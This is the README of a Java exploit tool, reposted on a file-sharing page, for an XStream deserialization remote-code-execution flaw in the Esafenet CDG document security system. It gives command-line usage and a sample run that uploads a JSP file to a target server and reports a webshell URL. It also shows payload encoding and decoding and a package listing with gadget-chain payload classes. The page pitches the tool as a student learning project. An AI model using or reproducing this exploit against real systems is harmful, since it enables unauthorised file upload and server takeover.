# CDGXStreamDeserRCE
> 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统存在XStream反序列化远程代码执行漏洞,攻击者可利用该漏洞对服务器上传任意文件,进而控制服务器权限。
## 使用
帮助信息
```bash
$ java -jar CDGXStreamDeserRCE.jar
亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
usage: Options
-d,--decode <arg> 密文解码
-e,--encode <arg> 加密XML反序列化payload
-h,--help 打印帮助信息
-p,--proxy <arg> 代理地址
-t,--target <arg> 目标URL
-uf,--upload-file <arg> 上传文件的本地路径
```
文件上传利用
```bash
$ cat test1.jsp
<%
out.println("e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43");
%>
$ java -jar CDGXStreamDeserRCE.jar -p http://127.0.0.1:8080 -uf test1.jsp -t https://192.168.31.190:8443
[+] Exploit Successed
[+] WebShell: https://192.168.31.190:8443/CDGServer3/test1.jsp
$ curl -k https://192.168.31.190:8443/CDGServer3/test1.jsp
e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43
```
密文解码
```bash
$ java -jar CDGXStreamDeserRCE.jar -d FEPCCCLCENHIPOAFPAPDDFCGEAPNMDBMOJPMJAKKNPHOKIKIDCBPHEGKLDGNHCBDEIMODEKMKPFBAIMMNLOJJKMIICLAPJAAFGNGAKFBMPKPJMOIKODEJJMHJCCHKBMFMMFDLOMDPABOJCEAPOFDCPMKGDHFNBBIMCIPAMMIIANFPAJHFAABLLLANNIDAGNKOHONJGFGBKHFDMCLJIMICBHBJEIAAIMACN
[+] Decode Successed:
<?xml version='1.0' encoding="gb2312"?>
<SystemReturn>
<returnMessage>Error1200</returnMessage>
</SystemReturn>
```
明文编码,读取文件内容进行编码或直接对字符串进行编码
```bash
$ java -jar CDGXStreamDeserRCE.jar -e payload.xml
```
```bash
$ java -jar CDGXStreamDeserRCE.jar -e "C:\Program Files (x86)\ESAFENET\CDocGuard Server\tomcat64\webapps\CDGServer3"
BCBILAKIDOOOCGKJDBBFOCGJFGFJPNJALCHEBLGLBFAMKDDLPBCFFJCJHOPGLEACMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGALLCGLOJNJBHCLMNNGHHJJNAAKPMEDFJDGCEMDADGDCEFFCGEGNFLGHCH
```
没有合适的资源?快使用搜索试试~ 我知道了~
温馨提示
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统存在XStream反序列化远程代码执行漏洞,攻击者可利用该漏洞对服务器上传任意文件,进而控制服务器权限。 使用 帮助信息 $ java -jar CDGXStreamDeserRCE.jar 亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 usage: Options -d,--decode <arg> 密文解码 -e,--encode <arg> 加密XML反序列化payload -h,--help 打印帮助信息 -p,--proxy
资源推荐
资源详情
资源评论
收起资源包目录
CDGXStreamDeserRCE-main.zip (57个子文件)
CDGXStreamDeserRCE-main
src
cn
hutool
http
HttpConnection.java 16KB
HttpRequest.java 39KB
META-INF
MANIFEST.MF 54B
com
cdg
Exploit.java 4KB
ServiceUtil.java 986B
yso
payloads
annotation
Dependencies.java 1KB
Authors.java 2KB
custom
TemplatesImplUtil.java 10KB
CustomCommand.java 2KB
ReleaseableObjectPayload.java 182B
CommonsBeanutils2.java 2KB
ObjectPayload.java 4KB
util
BASE64Decoder.java 7KB
PayloadRunner.java 2KB
CommonUtil.java 3KB
Reflections.java 3KB
DirtyDataWrapper.java 3KB
Gadgets.java 8KB
GeneratePayload.java 5KB
Strings.java 2KB
YsoConfig.java 243B
Serializer.java 863B
utils
Http.java 2KB
Decode.java 631B
Encode.java 1KB
bcel
HackBCELs.java 926B
CodeDecoder.java 4KB
libs
woodpecker-bcel-0.1.0.jar 401KB
netty-codec-http-4.1.86.Final.jar 636KB
Rijndael.jar 7KB
xmlpull-1.1.3.1.jar 7KB
reflections-0.9.9.jar 138KB
commons-beanutils-1.9.2.jar 228KB
commons-cli-1.4.jar 53KB
permit-reflect-0.3.jar 15KB
xstream-1.4.9.jar 536KB
hutool-all-5.8.8.jar 2.29MB
javassist-3.19.0-GA.jar 732KB
CDGXStreamDeserRCE.iml 1KB
.idea
artifacts
CDGXStreamDeserRCE_jar.xml 1KB
libraries
hutool_all_5_8_8.xml 223B
xmlpull_1_1_3_1.xml 221B
commons_beanutils_1_9_2.xml 237B
woodpecker_bcel_0_1_0.xml 233B
javassist_3_19_0_GA.xml 229B
reflections_0_9_9.xml 225B
permit_reflect_0_3.xml 227B
commons_cli_1_4.xml 221B
netty_codec_http_4_1_86_Final.xml 249B
xstream_1_4_9.xml 217B
Rijndael.xml 207B
vcs.xml 167B
misc.xml 258B
modules.xml 276B
.gitignore 176B
.gitignore 227B
README.md 2KB
共 57 条
- 1
资源评论
MarcoPage
- 粉丝: 4379
- 资源: 8837
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功